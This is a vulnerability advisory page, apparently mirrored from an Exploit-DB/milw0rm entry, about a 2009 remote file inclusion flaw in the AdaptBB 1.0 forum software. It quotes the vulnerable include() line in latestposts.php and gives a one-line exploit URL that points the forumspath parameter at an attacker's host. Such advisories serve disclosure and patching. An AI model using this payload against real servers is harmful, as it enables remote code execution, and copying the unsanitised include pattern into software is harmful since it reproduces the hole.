AdaptBB 1.0 Remote File Include

vendor:

AdaptBB

by:

xoron

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: AdaptBB

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:adaptbb:adaptbb:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

AdaptBB 1.0 Remote File Include

AdaptBB 1.0 is vulnerable to a Remote File Include vulnerability. The vulnerability exists in the latestposts.php file, in line 20, where the include() function is used to include the config.php file from the forumspath parameter. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable server, which will include the malicious file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of AdaptBB.

Source

Exploit-DB raw data:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-   
=-         AdaptBB 1.0  Remote File Include
=-
=-     Webpage:    http://www.adaptbb.com
=-     Download    http://sourceforge.net/project/downloading.php?group_id=253154&filename=AdaptBB_1.0.zip
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
=- Author: xoron
=-
=- Oss 14 Haziran!
=-
=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
=-  Bug Code: in latestposts.php
=-  
=-        in line 20. : include($forumspath."config.php");
=-
=-
=-
=-  /latestposts.php?forumspath=evilc0der?
=-
=-
=-  XOROn (C) 2009
=-
=-
=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2009-06-01]